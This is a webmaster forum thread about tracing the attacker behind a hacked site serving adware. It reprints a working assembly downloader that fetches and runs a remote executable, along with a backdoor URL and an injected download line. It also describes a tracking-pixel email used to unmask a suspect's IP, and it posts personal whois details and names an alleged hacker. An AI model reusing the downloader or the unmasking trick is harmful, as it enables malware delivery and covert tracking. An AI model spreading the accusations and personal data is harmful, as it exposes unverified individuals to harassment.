|
I clicked your site yesterday and got viruses, spywares and shit on my computer! Spent all last night deleting that shit! Thank's a lot....:321GFY :321GFY :321GFY
|
its its managed, the security is all their fault. they have no idea what is going on. they are clueless.
|
Learning more about this hacker....
xpire.info = A rooted server of someone elses.... I found a backdoor he installed: Http://xpire.info/s/2 http://xpire.info/s/2?=$REQUEST_URI;? Take a peek. That allows him to run shell commands. Trying to locate him, I found his thing hidden atop this site: http://www.allo-webmaster.com/heberg...xpire.info/s/2 Look at the small print on the top... Might wanna see if he owns that site or if the owner of the site can explain why that link is on the top? Perhaps he is compromised as well? Perhaps this IS him? The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. %% BookMyName Whois version 1.0 %% DOMAIN Domain Name : allo-webmaster.com (AWC18-BMN-DOM) Registrar : BookMyName Whois Server : whois.bookmyname.com Referral URL : https://www.bookmyname.com Registrant / Admin Contact : PERSON Zak SADIQ (SADIQ2-BMN-PE) hay salam 70 11000 Sale FRANCE phone : 02147483647 fax : e-mail : [email protected] Billing Contact : PERSON Zak SADIQ (SADIQ2-BMN-PE) hay salam 70 11000 Sale FRANCE phone : 02147483647 fax : e-mail : [email protected] Technical Contact : PERSON Zak SADIQ (SADIQ2-BMN-PE) hay salam 70 11000 Sale FRANCE phone : 02147483647 fax : e-mail : [email protected] Domain servers : ns1.publi6.net (NPN23-BMN-HST) ns2.publi6.net (NPN24-BMN-HST) Created on 03/10/2004 18:21:45 Updated on 04/02/2004 14:49:02 Expires on 03/10/2005 13:21:45 Interesting HTML: <title>Http://xpire.info/s/2 : recherche sur Http://xpire.info/s/2</title>hahahahahaha name="description" content="Http://xpire.info/s/2 "> hahahahahaha name="keywords" content="Http://xpire.info/s/2"> hahahahahaha name="revisit-after" content="15 days"> hahahahahaha name="robots" content="index,follow"> hahahahahaha NAME="Language" CONTENT="fr"> hahahahahaha name="rating" content="General"> hahahahahaha name="resource-type" content="document"> hahahahahaha name="distribution" content="Global"> hahahahahaha name="copyright" content="Copyright (C), 2004, Allo webmaster , Http://xpire.info/s/2 "> hahahahahaha name="author" CONTENT="Zaki"> hahahahahaha NAME="Language" CONTENT="fr"> hahahahahaha NAME="Identifier-URL" CONTENT="http://www.allo-webmaster.com"> hahahahahaha NAME="Reply-to" CONTENT="[email protected]"> hahahahahaha hahahahahahahahahaha="Content-Type" content="text/html; charset=iso-8859-1"> <link href="http://www.allo-webmaster.com/style.css" rel="stylesheet" type="text/css"> |
Here is another domain he owns/owned:
Domain Name: B00GLE.COM Registrant: n/a Janet Jacjson ([email protected]) Hali-gali, 77 Deli null,12345 IN Tel. +91.226370256 Creation Date: 31-Mar-2004 Expiration Date: 31-Mar-2005 Domain servers in listed order: ns1.smartdns.org ns2.smartdns.org ns1.smartnic.org ns2.smartnic.org Administrative Contact: n/a Janet Jacjson ([email protected]) Hali-gali, 77 Deli null,12345 IN Tel. +91.226370256 Technical Contact: n/a Janet Jacjson ([email protected]) Hali-gali, 77 Deli null,12345 IN Tel. +91.226370256 Billing Contact: n/a Janet Jacjson ([email protected]) Hali-gali, 77 Deli null,12345 IN Tel. +91.226370256 Status:SUSPENDED Note: This Domain Name is Suspended. In this status the domain name is InActive and will not function. |
Seems that that server (the xpire.info one) is running a proxy server:
Interesting ports on 202.99.23.162: (The 1653 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 80/tcp open http 8080/tcp closed http-proxy |
This is the root site on the server:
http://202.99.23.162/ Not sure what language it is, but that is who the main owner of the server seems to be. |
He seems to center around xpire.com and b00gle.com:
http://qkacdesign.uw.hu/chcounter/st...rs_days_stats= |
|
Seems he is busy at work, that link does not work anymore, howver this one began to:
http://www.xpire.info/fa/tool.html This is what the source of tht page look like: Code:
<html> |
Surely this guy is doing some bad shit:
Notice the telnet calls? Code:
var downloadurl="http://213.159.117.133/dl/loadadv65.exe"; |
Master of misdirection this guy is:
good thing the internet has a memory :) http://216.239.59.104/search?q=cache...b00gle.com/fa/ %3Fd%3Dget+&hl=en http://www.google.com/search?q=cache...b00gle.com/fa/ tool.html+&hl=en http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the same files, as if copied in a for loop i especially liked 2 files in the dir; counter.htm containing the extremely funny hahahahahahahaha language="hahahahahahahahahaha"> <!-- var lang = navigator.systemLanguage; if (lang hahahaha "ru") document.location = "home.html"; //--> </hahahahahahahaha but then i saw this: http://www.pizdato.biz/acc10/2DimensionOfExploits.asm Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope im not Violating someones copyright by posting this here,.... .386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\user32.inc includelib \masm32\lib\user32.lib .data ________szLibrary db "urlmon.dll",0 ________szFunction db "URLDownloadToFileA",0 ________szFileName db "c:\y.exe", 0 .code start: ________invoke GetCommandLineA ________add ax, 0Ah ________lea ecx, [eax] ________push ecx ________invoke LoadLibrary, addr szLibrary ________invoke GetProcAddress, eax, addr szFunction ________pop ecx ________push 0 ________push 0 ________lea ebx, [szFileName] ________push ebx ________push ecx ________push 0 ________call eax ________invoke WinExec, addr szFileName, 1 ________invoke ExitProcess, NULL end start Yet i do feel a bit suspicious about this set of files;,... bit TOO educating i think ;) |
Wow!
http://www.webhelper4u.com/thewatcherlist.html Jackpot. It could be ANY of those people. IS YOUR NAME ON THAT LIST? Lots of adult sites listed. |
Ok, I know the issue now:
Your PHP is insecure. Update and secure your PHP on your web server. Update apache as well. Make sure you are current. Here is a list of the AdWare people and their IP's: http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html Notice if you copy the first three parts of an IP and search elsewhere in the list you will find many domain on the same class C? Voila. Happy hanging. |
Don't forget your pipe, Sherlock
|
Bumping this. I hit one of the BangBros Tugjobs hosted galleries and was hit with and active X for Trytoimprovesecurity.com also. It attempts to hijack the browser and install something, blocked it with Norton.
IP associated is 213.159.117.133 |
Amazing how many adult sites are engagine in bad adware:
http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html I just got an ICQ from a stranger telling me that if I push any further they will come kill me. They are hackers paid by adult industry to hack sites and put that on them, fucked up shit. Fuck them, I will keep pushing and find out who they are and expose them for hacking into sites illegaly. Put aside the adware part, they are still breaking and entering. I'm coming to get ya! |
who's your hosting company?
|
Quote:
|
Quote:
Out of 100, I'd say 95 would be hackable. And that's just with a basic security audit, if I did a full blown one all of them, I'd say at leat 99 of them would be insecure in one way or another. I've been doing security work for the better part of 20 years and have yet to see a fully secure system. If someone wants in, they will get in. Plain and simple. I've also yet to see a system that I haven't been able to penatrate during a full blown pen test. Most security people are that way and if they are not, they need to learn more. |
I am happy though that alot of webmasters/site owners are taking security
into consideration now. They used to laugh back in the days when we told them it was a hacker..... it had the same effect as if we told them a yellow zebra was standing behind them. I have been in security since 1992 and just love the thrill of securing a box and hunting down hackers. :-) I smell their blood.l lol |
Quote:
but there is way to put a server very very secure even against unknown exploit i can sure make a server 99.9% of the hackers cant hack |
Quote:
Yea disable every service known and pray that your kernel is secure and your router and firewall is updated. I've gotten around many "secure" servers because they didn't keep their routers and firewalls updated. |
Quote:
And don't forget to compile all your distro by hand and strip all the binaries. Also if you want more security put all the services in chroot (best optoin is one service per server)... and don't just copy all the system into the chroot, only the needed libraries... apache does not need a bash shell in order to run into it's sandbox. Of course, this will do nothing if you open every possible service around and set your root password to something easy to guess. So configure your firewall properly blocking all inbound SYN packets except for the ports where you will offer some service and all outbound packets (any traffic) except for the ports your services will use. You will get some headaches configuring FTP services using these firewall rules... but it's not very big problem. This concept has been tested for over 5 years with IronBox Linux on an open for hacking shell access server (they were able to start a shell session on the box) and no one has been able to escalate privileges. It's not only the firewall, it's the entire system. Usually firewalls are the most useless part in security because they could be always bypassed using one method or another. It's not easy and takes some time to bypass a firewall, but it's still possible nod not enough difficult to stop a not very novice hacker. |
I have caught your hacker!
Here is the lowdown..... To find the hacker you must first find out who owns those domains..... And the only way to see who owns those domains (because the info is fake) is to find out WHO is receiving the emails for the domain's contact email account, which for all those domains, is the same person. This person uses a yahoo email address, and getting the info on who owns an email account from yahoo would be very difficult, especially considering they most likely filled in fake info there as well. So why not get their IP from yahoo you ask? Because yahoo won't help you without a subpeona..... Even friends I have at yahoo can't help me because they do not allow access to logs except to their legal dept. which is a pain to deal with as well..... So, I ask myself, If this person is using a yahoo web based email account to check his mail, and we need his IP address to identify him, let's get the IP already! I decided to email an artifical spam mail to him. The secret here is that he is the ONLY one getting this spam mail. I used a rather catchy subject that he COULD NOT RESIST: "Hacker Caught?" When he looked at the email, it was nothing special. I made it look like an ad to an online casino. He would take a peek at it, then most likely just delete it thinking to himself, "fucking spammer!", while his heart pumped heavily thinking perhaps he had been caught. What he DID NOT KNOW that happened behind the scenes is that in the spam mail, the only image that was loaded in the email was an invisible 1x1 pixel. All other items in the mail were HTML. This 1x1 hidden pixel was loaded off of MY server using an image name that NO ONE would know. In fact, the image doesn't even exist and since I set the height and width of the image to 1, he would not see a broken image in there anyways..... this would simply generate a couple log entries on my server letting me know HIS HOME COMPUTERS IP ADDRESS because in order to use yahoo mail, you have to use a web browser, and he certainly did!!! Because the image does not exist on my server, but his browser tried to load it, his accessing his yahoo mail led to 2 entries in my server logs. One is the access_log entry, and the other, when the image could not be found, was the error_log entry. The URL to the non-existant image is: http://www.splitinfinity.com/themainman access_log entry: 195.131.125.119 www.splitinfinity.com - [19/Aug/2004:01:01:46 -0700] "GET /themainman HTTP/1.1" 302 302 "http://us.f403.mail.yahoo.com/ym/ShowLetter?MsgId=1922_1014156_59656_1208_1013_0_84 6_4944_1839376362&Idx=0&YY=48958&inc=25&order=down &sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2" error_log entry: [Thu Aug 19 01:01:46 2004] [error] [client 195.131.125.119] File does not exist: /home/split/splitinfinity.com/public_html/themainman, referer: http://us.f403.mail.yahoo.com/ym/Sho...ead=&box=Inbox ******** His IP address is: 195.131.125.119 ********** This is most likely a dynamic IP, but, since we know the time and date of the access, we can call the IP owner (his ISP as listed below) and perhaps get that information. I will continue to send him some of these emails and log all the ip ranges he comes from, which im sure at this point will all be the same isp since it is a broadband connection on his end. w00000h00000! betcha he didn't see that coming. |
OrgName: RIPE Network Coordination Centre
OrgID: RIPE Address: Singel 258 Address: 1016 AB City: Amsterdam StateProv: PostalCode: Country: NL ReferralServer: whois://whois.ripe.net:43 NetRange: 195.0.0.0 - 195.255.255.255 CIDR: 195.0.0.0/8 NetName: RIPE-CBLK3 NetHandle: NET-195-0-0-0-1 Parent: NetType: Allocated to RIPE NCC NameServer: NS-PRI.RIPE.NET NameServer: NS2.NIC.FR NameServer: SUNIC.SUNET.SE NameServer: AUTH03.NS.UU.NET NameServer: SEC1.APNIC.NET NameServer: SEC3.APNIC.NET NameServer: TINNIE.ARIN.NET Comment: These addresses have been further assigned to users in Comment: the RIPE NCC region. Contact information can be found in Comment: the RIPE database at http://www.ripe.net/whois RegDate: 1996-03-25 Updated: 2004-03-16 TechHandle: RIPE-NCC-ARIN TechName: RIPE NCC Hostmaster TechPhone: +31 20 535 4444 TechEmail: [email protected] # ARIN WHOIS database, last updated 2004-08-18 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. |
Further more accurate whois data from RIPE:
The company who OWNS the IP itself is: WEBPlus Ltd. St.Petersburg, RU Their email addresses: [email protected] [email protected] [email protected] [email protected] Michael V. Vasiliev ZAO WebPlus, 29 Kolomenskaya 191119, Saint-Petersburg Russia phone: +7 812 3269020 fax-no: +7 812 3269029 |
Great job, boss
|
Quote:
that's total assholish of you. Like it's his fault someone hacked his shit. it's as retarted as blaming Ford becuase someone slammed a semi into the car but buddie died cause he didnt have seatbelts on. Point is, secure or not, these people find ways in. |
This thread was surely interesting...
|
well done SplitInfinity. Was very interesting to follow your progress even if most of the links are already dead
|
very impressive splitinfinity, now we need a team of webmasters to pay this guy a visit
|
|
Quote:
|
Quote:
The BW prices on your site, are they actual usage (as in 320 GB in+out combined is 1 mbps) or 95 pecentile based? 95% I guess? |
|
Well done!
I see that at someone else on here has the skills. Tracking down hackers isn't as hard as people think it is. I did it many many times when I was the IT manager and head of security for a live feed company and also have done it for clients of mine. I may have a use for you sometime as sometimes I get too busy for all my clients and taking on more work is not always the best things as I want my clients to be %150 happy with what I do and so I limit what I'll take so I don't stretch myself too thin. Quote:
|
splitinfinity is the fucking MAN!!! :thumbsup
|
You really know your shit SplitInfinty, very impressive!
I'd trust you with my box :thumbsup |
The bandwidth pricing on SplitInfinity.com is average utilization based on MRTG graphs. Bring your sites over. :-)
Thanks for the compliments. Anyone else need any help? I really love doing this stuff.... By the way, The guy's name is Miroslav Petrovic who hacked your site. :-) Go get em! |
So how are things going. have you owned is ass yet?
|
| All times are GMT -7. The time now is 12:29 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123